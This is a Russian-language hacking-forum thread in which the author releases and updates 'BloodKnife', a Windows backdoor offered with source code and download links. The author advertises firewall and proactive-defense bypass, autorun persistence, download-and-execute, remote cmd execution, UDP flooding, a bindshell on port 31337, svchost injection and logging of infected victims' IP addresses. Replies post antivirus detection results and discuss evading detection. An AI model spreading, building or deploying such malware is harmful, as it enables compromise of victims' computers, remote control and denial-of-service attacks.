Форум АНТИЧАТ - Backdoor N2 v.1.0. [BloodKnife]

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)

- - Backdoor N2 v.1.0. [BloodKnife] (https://forum.antichat.xyz/showthread.php?t=42672)

Backdoor N2 v.1.0. [BloodKnife]

Вот, наконец то появилось время дописать. Итак, описание:

1)Есть какой-никакой обход фаеров(переписаный _dkcs_ddos_bot`овский).
2)SDT restore(обход проактивок).
3)Инжектом опять не получилось.
4)Копируется в системную диру, пишется в автозагрузку.

Функции:
1)Отправка месаги юзеру.
2)просмотр содержимого файла.
3)Download && Execute.
4)Открыть\закрыть cd-rom.
5)Разные игры с панелькой винды, нажатие кнопки пуск.
6)Выполнение команд в cmd.
7)UDP Flood(!).
8)Выключение виря.

Правда вес подкачал - 60кб. Управляется через клиент. Ну, думаю такому монстру нужно дать имя. Назвал BloodKnife. Думаю сделать web-админку. Но это в лучше случае осенью. Ну и самое главное - с исходниками!

Скачать:
http://lordofring.tushino.com/BloodKnife_v1.0.rar
http://softz.ifolder.ru/2420331
http://http://rapidshare.com/files/38282705/BloodKnife_v1.0.rar.html

[update]
Версия 1.4
+Добавлен отстук по стату. IP заражённых компов пишется в лог.
http://lordofring.tushino.com/BloodKnife.v.1.4.rar - c исходниками
________________________
Версия 1.3
+bindshell на 31337 порту
+вес 16кб.
+инжект в svchost.exe
+меньше палева
+функции все теже, клиент юзать тотже.
http://lordofring.tushino.com/BK.v.1.3.rar

Палиться твой вирус нодом при скачивании.
Кстати, тебе удалось запустить dkcs_ddos_bot ??

Удавалось. Но работает он криво. Инжект не пашет.В некоторые функции вызываю переполнение буфера. Биндшелл пашет, но тяжело и там в коде goto .illusion_bot в 100 раз лучше.

Ky3bMu4 а можно кинуть на virustotal ?

Делайте что хотите. Если запалите(каспером пока вроде не палится ), но вам же хуже.;)

Цитата:

Да я знаю каспер не палит у него с обнавлениями проблемы!!!

Списбо тебе Ky3bMu4 жду новые версии!!!

Цитата:

Ky3bMu4 смотри сколько антивирей палят!

AhnLab-V3 2007.6.20.1 06.20.2007 no virus found
AntiVir 7.4.0.34 06.20.2007 no virus found
Authentium 4.93.8 06.19.2007 W32/Backdoor.XXS
Avast 4.7.997.0 06.20.2007 Win32:Ircbot-AHP
AVG 7.5.0.467 06.19.2007 no virus found
BitDefender 7.2 06.20.2007 no virus found
CAT-QuickHeal 9.00 06.19.2007 no virus found
ClamAV devel-20070416 06.20.2007 no virus found
DrWeb 4.33 06.20.2007 DLOADER.Trojan packed by BINARYRES
eSafe 7.0.15.0 06.19.2007 no virus found
eTrust-Vet 30.7.3727 06.19.2007 no virus found
Ewido 4.0 06.19.2007 no virus found
FileAdvisor 1 06.20.2007 no virus found
Fortinet 2.91.0.0 06.20.2007 no virus found
F-Prot 4.3.2.48 06.19.2007 W32/Backdoor.XXS
F-Secure 6.70.13030.0 06.20.2007 no virus found
Ikarus T3.1.1.8 06.20.2007 no virus found
Kaspersky 4.0.2.24 06.20.2007 no virus found
McAfee 5056 06.19.2007 no virus found
Microsoft 1.2607 06.19.2007 Trojan:Win32/AgentBypass.gen!A
NOD32v2 2341 06.20.2007 probably unknown NewHeur_PE virus
Norman 5.80.02 06.19.2007 no virus found
Panda 9.0.0.4 06.20.2007 Suspicious file
Sophos 4.18.0 06.12.2007 no virus found
Sunbelt 2.2.907.0 06.16.2007 no virus found
Symantec 10 06.20.2007 Backdoor.IRC.Bot
TheHacker 6.1.6.136 06.20.2007 no virus found
VBA32 3.12.0.2 06.20.2007 suspected of Embedded.Trojan.DownLoader.12049
VirusBuster 4.3.23:9 06.19.2007 no virus found
Webwasher-Gateway 6.0.1 06.20.2007 no virus found

сможешь исправить?

W32/Backdoor.XXS а что это значит? типа XSS'ка на удаленном компе? о_О

Это версия бекдора :\ антивирусники так его обозначили

Ну вот, уже версия 1.1
+Добавлен bindshell на 31337`атом порту(через telnet).
+Вес сокращён до 56кб.
Клиент юзать тот же.

Скачать:
http://lordofring.tushino.com/BK1.1.rar